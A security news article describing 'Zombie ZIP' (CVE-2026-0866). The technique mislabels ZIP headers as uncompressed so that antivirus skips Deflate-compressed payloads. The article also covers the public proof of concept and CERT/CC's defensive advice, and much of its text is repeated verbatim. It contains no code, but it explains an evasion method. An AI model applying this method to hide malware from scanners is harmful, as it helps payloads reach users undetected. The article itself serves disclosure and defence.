- 910
- 246
Security researcher Chris Aziz of Bombadil Systems developed and demonstrated an attack technique called Zombie ZIP , which conceals malicious payloads in ZIP archives so they evade detection by antivirus and EDR systems.
The specialist explains that the attack involves manipulating ZIP file headers. The Method field is set to 0 (STORED), meaning "data uncompressed." However, the archive's contents are actually compressed using the Deflate algorithm. Antivirus programs trust the header and attempt to scan the contents as raw bytes, but see only compressed "noise" that doesn't recognize signatures.
Standard utilities like WinRAR, 7-Zip, or unzip report errors or extract corrupted data when attempting to unpack such an archive. This occurs because the CRC (checksum) value in the archive is set for the uncompressed version of the payload. However, a specially crafted downloader that ignores the header and decompresses the data as Deflate can easily extract the hidden payload.
Aziz has already published a
proof-of-concept (PoC) on GitHub, including sample archives and a detailed description of the method. The CERT/CC has already issued a warning about this attack technique. The issue has been assigned the identifier CVE-2026-0866, and experts note that it resembles the vulnerability CVE-2004-0935, discovered over 20 years ago in an early version of ESET antivirus.
They also emphasize that some decompression tools can still correctly handle such "zombie archives."
CERT/CC recommends that security solution developers validate the compression method field against actual data, add mechanisms to detect inconsistencies in the archive structure, and implement more aggressive scanning modes. Users are advised to be cautious with archives from unknown sources and to delete them if an "unsupported method" error occurs during decompression.
The specialist explains that the attack involves manipulating ZIP file headers. The Method field is set to 0 (STORED), meaning "data uncompressed." However, the archive's contents are actually compressed using the Deflate algorithm. Antivirus programs trust the header and attempt to scan the contents as raw bytes, but see only compressed "noise" that doesn't recognize signatures.
Standard utilities like WinRAR, 7-Zip, or unzip report errors or extract corrupted data when attempting to unpack such an archive. This occurs because the CRC (checksum) value in the archive is set for the uncompressed version of the payload. However, a specially crafted downloader that ignores the header and decompresses the data as Deflate can easily extract the hidden payload.
Aziz has already published a
proof-of-concept (PoC) on GitHub, including sample archives and a detailed description of the method. The CERT/CC has already issued a warning about this attack technique. The issue has been assigned the identifier CVE-2026-0866, and experts note that it resembles the vulnerability CVE-2004-0935, discovered over 20 years ago in an early version of ESET antivirus.
They also emphasize that some decompression tools can still correctly handle such "zombie archives."
CERT/CC recommends that security solution developers validate the compression method field against actual data, add mechanisms to detect inconsistencies in the archive structure, and implement more aggressive scanning modes. Users are advised to be cautious with archives from unknown sources and to delete them if an "unsupported method" error occurs during decompression.